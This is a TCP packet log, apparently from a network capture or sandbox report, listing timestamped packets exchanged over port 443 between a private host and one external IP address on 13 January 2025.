Jan 13, 2025 13:54:17.793237925 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.795536995 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.795614958 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820420027 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820482969 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820507050 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820538044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820560932 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820564985 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820589066 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820601940 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820626974 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820630074 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820650101 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820662975 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.820688963 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820724010 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.820962906 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821010113 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821023941 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821038008 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821069002 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821069956 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821115971 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821116924 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821130037 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821171045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821171045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821763039 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821818113 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821831942 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821845055 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.821901083 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.821901083 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.828649044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.828706980 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.828744888 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.828761101 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.828788996 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.828828096 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.832190990 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.832268953 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.838171959 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.838224888 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.838361979 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.838417053 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.842173100 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.842225075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.842238903 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.842253923 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.842281103 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.842911959 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.849019051 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.849095106 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.849189997 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.849245071 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.854785919 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.854840994 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.854866028 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.854921103 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.861104012 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.861171007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.861171007 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.861185074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.861373901 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.861373901 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.867819071 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.867889881 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.868004084 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.868040085 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.868108034 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.871305943 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.871383905 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.871390104 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.871404886 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.871450901 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.871475935 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.874352932 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.874425888 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.874577045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.874577045 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.874614954 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.874783039 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.878088951 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.878164053 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.878180027 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.878252983 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.883644104 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.883711100 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.883749962 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.883805990 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.888375044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.888423920 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.888489008 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.888519049 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.888562918 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.888595104 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.897226095 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.897294998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.897316933 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.897329092 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.897392988 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.897440910 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.900787115 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.900855064 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.900921106 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.900974035 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.906855106 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.906894922 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.906922102 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.906933069 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.906954050 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.906999111 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.915503979 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.915560007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.915580988 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.915595055 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.915627956 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.915661097 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.919096947 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.919138908 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.919167995 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.919181108 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.919209003 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.919230938 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.925142050 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.925229073 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.925252914 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.925307989 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.925348043 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.925371885 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.929219007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.929271936 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.929280996 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.929296017 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.929321051 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.929371119 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.935909986 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.935975075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.935992002 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.936007023 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.936036110 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.936058998 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.941833973 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.941926956 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.941931963 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.941952944 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.941982031 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.942012072 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.947909117 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.947978973 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.948048115 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.948111057 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.954710007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.954808950 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.954809904 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.954838037 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.954894066 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.954921007 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.958141088 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.958211899 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.958280087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.958345890 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.962383032 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.962490082 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.962493896 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.962506056 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.962552071 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.962569952 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.964965105 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.965023994 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.965039968 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.965053082 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.965086937 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.965106010 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.970541954 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.970623016 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.970630884 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.970690012 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.975425959 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.975495100 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.975528955 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.975584984 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.986639977 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.986701965 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.986710072 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.986721992 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.986800909 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.987617016 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.987673044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.987694025 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.987700939 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.987735987 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.987761974 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.993648052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.993706942 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.993794918 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.993853092 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.002255917 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.002311945 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.002325058 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.002351999 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.002371073 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.002371073 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.002403975 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.006556988 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.006617069 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.006618023 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.006639004 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.006669998 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.006685019 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.010029078 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.012016058 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.012099028 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.012188911 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.012248039 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.016160965 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.016233921 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.016236067 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.016248941 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.016280890 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.016307116 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.022926092 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.022984982 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.022989035 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.022994995 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.023041964 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.028599977 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.028657913 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.028676033 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.028682947 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.028708935 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.028740883 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.034943104 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.034997940 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.035017014 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.035022020 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.035049915 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.035075903 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.041723967 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.041781902 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.041785002 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.041794062 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.041840076 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.044981003 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.045038939 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.045116901 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.045166016 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.047935963 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.047991037 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.048039913 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.048089981 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.051784992 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.051846027 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.051850080 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.051862001 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.051903963 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.071938992 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072002888 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072011948 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072031021 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072056055 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072082043 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072084904 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072097063 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072130919 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072160959 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072211981 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072329998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072379112 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.072391987 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.072449923 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.075189114 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.075254917 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.075256109 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.075267076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.075309992 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.080580950 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.080635071 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.080682039 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.080693007 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.080708027 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.080777884 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.089277983 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.089337111 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.089369059 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.089375973 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.089390993 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.089426994 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.092784882 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.092880011 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.092896938 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.092953920 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.098891020 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.098947048 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.098954916 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.098961115 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.098999977 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.099024057 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.102976084 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.103039980 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.103168011 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.103238106 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.111186028 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.111263990 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.111310005 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.111383915 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.115663052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.115744114 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.115787029 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.115844011 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.121915102 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.121999979 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.122041941 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.122097015 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.128660917 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.128730059 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.128792048 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.128861904 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.132026911 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.132118940 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.132147074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.132205009 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.134998083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.135055065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.135118961 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.135178089 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.138887882 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.138953924 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.139048100 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.139126062 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.144371033 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.144449949 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.144546986 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.144606113 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.158775091 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.158835888 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.158901930 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.158962965 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.159164906 CET	443	49740	59.110.190.21	192.168.2.4
